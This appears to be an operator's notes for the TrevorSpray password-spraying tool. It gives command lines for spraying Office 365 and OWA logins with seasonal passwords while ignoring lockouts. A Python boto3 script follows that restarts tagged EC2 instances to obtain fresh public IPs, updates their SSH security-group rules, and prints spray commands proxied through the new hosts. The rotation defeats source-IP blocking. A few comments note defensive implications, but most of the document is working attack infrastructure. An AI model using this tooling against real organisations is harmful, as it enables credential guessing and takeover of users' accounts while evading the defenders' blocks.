TrevorSpray

TrevorSpray

O365:

trevorspray --users 'USERS.txt' -p PASSWORD -i s.pem --delay 60 --lockout-delay 50 --random-useragent --jitter 30 -m msol --ignore-lockouts --ssh  USER@HOST USER@HOST 

OWA:

trevorspray -u ../azurehound/users.txt -p Summer22 -m owa --url https://autodiscover.DOMAIN.co.uk/autodiscover/autodiscover.xml

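Update IPs: the script below stops and restarts the EC2 instances tagged `TREVOR*` so that they come back with new public IPs, swaps the port-22 /32 ingress rules in the security group over to the new addresses, and prints the spray commands for the new hosts. For defenders, the consequence is that a source-IP blocklist goes stale on every restart, so detection has to key on failed-authentication patterns per account across many source addresses.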

import boto3, os, time
import numpy as np

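# Connection settings for the EC2 API client shared by the helpers below.
# The access key is read from the environment instead of being written into
# the file, so the script can be stored or shared without carrying a
# long-lived credential. When the variables are unset the values are None and
# boto3 falls back to its default credential chain.
region = os.environ.get('AWS_DEFAULT_REGION', 'eu-west-2')
access_key_id = os.environ.get('AWS_ACCESS_KEY_ID')
access_key = os.environ.get('AWS_SECRET_ACCESS_KEY')
client = boto3.client('ec2', region_name=region, aws_access_key_id=access_key_id, aws_secret_access_key=access_key)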

def instances():
	"""Collect the EC2 instances whose Name tag matches ``TREVOR*``.

	Uses the module-level ``client`` and a single ``describe_instances``
	call; only the first response page is read.

	Returns:
		A 3-tuple ``(stopped_ids, running_ids, running_ips)``. Instances in
		any state other than ``stopped`` or ``running`` are ignored.

	Raises:
		KeyError: if a running instance has no ``PublicIpAddress`` field.
	"""
	name_pattern = 'TREVOR*'
	response = client.describe_instances(Filters=[{'Name': 'tag:Name','Values': [name_pattern]}])
	stopped_instance_ids = []
	started_instance_ids = []
	instance_ips = []
	for reservation in response['Reservations']:
		for machine in reservation['Instances']:
			state = machine['State']['Name']
			if state == 'stopped':
				stopped_instance_ids.append(machine['InstanceId'])
			elif state == 'running':
				started_instance_ids.append(machine['InstanceId'])
				# Plain indexing on purpose: the ID and IP lists stay aligned.
				instance_ips.append(machine['PublicIpAddress'])
	return stopped_instance_ids, started_instance_ids, instance_ips

def stop(instance_id):
	"""Ask EC2 to stop one instance and return the state name it reports.

	Args:
		instance_id: ID of the instance to stop.

	Returns:
		The ``CurrentState`` name of the first entry in the response's
		``StoppingInstances`` list (the caller polls while it is 'stopping').
	"""
	response = client.stop_instances(InstanceIds=[instance_id])
	first_change = response['StoppingInstances'][0]
	return first_change['CurrentState']['Name']

def start(instance_id):
	"""Ask EC2 to start one instance and return the state name it reports.

	Args:
		instance_id: ID of the instance to start.

	Returns:
		The ``CurrentState`` name of the first entry in the response's
		``StartingInstances`` list (the caller polls while it is 'pending').
	"""
	response = client.start_instances(InstanceIds=[instance_id])
	first_change = response['StartingInstances'][0]
	return first_change['CurrentState']['Name']

def update_sec_group(old_ips, new_ips):
	"""Swap the per-host SSH ingress rules of the 'launch-wizard-18' group.

	Every address in ``old_ips`` has its tcp/22 ``/32`` rule revoked, then
	every address in ``new_ips`` gets one authorized. Each API call is
	attempted independently: a failure is printed and the loop carries on,
	so a failed revoke leaves the stale rule in place.

	Args:
		old_ips: addresses whose rules are removed.
		new_ips: addresses whose rules are added.

	Raises:
		IndexError: if no security group with that name is returned.
	"""
	# A fresh client is built here; it shadows the module-level one.
	ec2 = boto3.client('ec2', region_name=region, aws_access_key_id=access_key_id, aws_secret_access_key=access_key)
	lookup = ec2.describe_security_groups(Filters=[{'Name': 'group-name','Values': ['launch-wizard-18']}])
	group_id = lookup['SecurityGroups'][0]['GroupId']

	def ssh_rule(address):
		# One tcp/22 permission limited to the single host address.
		return [{'FromPort': 22, 'IpProtocol': 'tcp', 'ToPort': 22, 'IpRanges': [{'CidrIp': f'{address}/32'}]}]

	# Revoke the rules of the previous addresses first.
	for address in old_ips:
		try:
			ec2.revoke_security_group_ingress(GroupId=group_id, IpPermissions=ssh_rule(address), DryRun=False)
		except Exception as e:
			print(f'Error removing old rule: {e}')

	# Then authorize the current addresses.
	for address in new_ips:
		try:
			ec2.authorize_security_group_ingress(GroupId=group_id, IpPermissions=ssh_rule(address), DryRun=False)
		except Exception as e:
			print(f'Error adding new rule: {e}')

def banner():
	"""Clear the terminal and print the ASCII-art banner."""
	# 'cls' on Windows (os.name == 'nt'), 'clear' on every other platform.
	clear_command = 'cls' if os.name == 'nt' else 'clear'
	os.system(clear_command)

	art = """
bbbbbbbb                                                                               dddddddd
b::::::b                                                                               d::::::d
b::::::b                                                                               d::::::d
b::::::b                                                                               d::::::d
 b:::::b                                                                               d:::::d
 b:::::bbbbbbbbb    rrrrr   rrrrrrrrr       eeeeeeeeeeee    aaaaaaaaaaaaa      ddddddddd:::::d
 b::::::::::::::bb  r::::rrr:::::::::r    ee::::::::::::ee  a::::::::::::a   dd::::::::::::::d
 b::::::::::::::::b r:::::::::::::::::r  e::::::eeeee:::::eeaaaaaaaaa:::::a d::::::::::::::::d
 b:::::bbbbb:::::::brr::::::rrrrr::::::re::::::e     e:::::e         a::::ad:::::::ddddd:::::d
 b:::::b    b::::::b r:::::r     r:::::re:::::::eeeee::::::e  aaaaaaa:::::ad::::::d    d:::::d
 b:::::b     b:::::b r:::::r     rrrrrrre:::::::::::::::::e aa::::::::::::ad:::::d     d:::::d
 b:::::b     b:::::b r:::::r            e::::::eeeeeeeeeee a::::aaaa::::::ad:::::d     d:::::d
 b:::::b     b:::::b r:::::r            e:::::::e         a::::a    a:::::ad:::::d     d:::::d
 b:::::bbbbbb::::::b r:::::r            e::::::::e        a::::a    a:::::ad::::::ddddd::::::dd
 b::::::::::::::::b  r:::::r             e::::::::eeeeeeeea:::::aaaa::::::a d:::::::::::::::::d
 b:::::::::::::::b   r:::::r              ee:::::::::::::e a::::::::::aa:::a d:::::::::ddd::::d
 bbbbbbbbbbbbbbbb    rrrrrrr                eeeeeeeeeeeeee  aaaaaaaaaa  aaaa  ddddddddd   ddddd

[*] Now go get that bread
 """
	print(art)

# Script entry point: inventory the tagged instances, optionally stop the
# running ones, start everything that is stopped, re-read the addresses,
# update the security group and print one command line per password.
if __name__ == '__main__':
	banner()
	# old_ips holds the public addresses of the instances running right now.
	stopped_instances, started_instances, old_ips = instances()
	print(f'[+] identified {len(stopped_instances)} stopped instances and {len(started_instances)} currently running')
	decide = input('do you want to restart?\n')
	# Any answer containing the letter 'y' counts as yes.
	if 'y' in decide.lower():
		print(f'[+] current IPs: {old_ips}')
		for InstanceId in started_instances:
			stopping = stop(InstanceId)
			# Polling is done by re-issuing the stop request every 2 seconds
			# until the reported state is no longer 'stopping'.
			while stopping == 'stopping':
				print(f'[+] stopping instance {InstanceId}, current state ')
				print(f'{stopping:}', end="\r")
				time.sleep(2)
				stopping = stop(InstanceId)
			# Queue the instance for the start loop below.
			if InstanceId not in stopped_instances:
				time.sleep(2)
				stopped_instances.append(InstanceId)
	# This loop sits outside the 'y' branch, so instances that were already
	# stopped are started whatever the answer was.
	for InstanceId in stopped_instances:
		starting = start(InstanceId)
		# Same polling scheme: repeat the start request while 'pending'.
		while starting == 'pending':
			print(f'[+] starting instance {InstanceId} current state:')
			print(f'{starting:}', end="\r")
			time.sleep(2)
			starting = start(InstanceId)
	# Second inventory: the addresses of whatever is running now.
	stopped_instances, started_instances, new_ips = instances()
	print(f'[+] got the following IPs: {new_ips}')
	if new_ips:
		update_sec_group(old_ips, new_ips)
		print(f'[+] Added new ips to sec group')
		# Season + year candidates: the pattern a banned-password list is
		# meant to reject on the identity-provider side.
		passwords = ['Summer22', 'Summer2022', 'Winter2022', 'Winter22', 'Spring2022', 'Spring22']
		# x indexes passwords below; i and new_hosts are never read.
		x = 0
		i = 1
		new_list = []
		new_hosts = []
		# Build the user@host entries passed to --ssh.
		for instance in new_ips:
				print(f'new ip len: {len(new_ips)}')
				print(f'new list len: {len(new_list)}')
				new_list.append(f'ubuntu@{instance}')
		x = 0
		# One iteration per password. The commands are only printed, not run,
		# and the split chunk itself is not referenced: each line joins the
		# whole of new_list. The loop variable shadows the builtin list.
		for list in np.array_split(new_list, len(passwords)):
			print(f"trevorspray --users 'passenum.txt' -p '{passwords[x]}' -i s.pem --delay 60 --lockout-delay 50 --random-useragent --jitter 30 -m msol --ignore-lockouts --ssh  {' '.join(new_list)}\\n\"")
			x = x + 1
		print(f'Goodluck...')
		exit()
		# Unreachable: exit() above ends the process.
		i = i + 1
	else:
		print(f'Error, no new ips generated...')
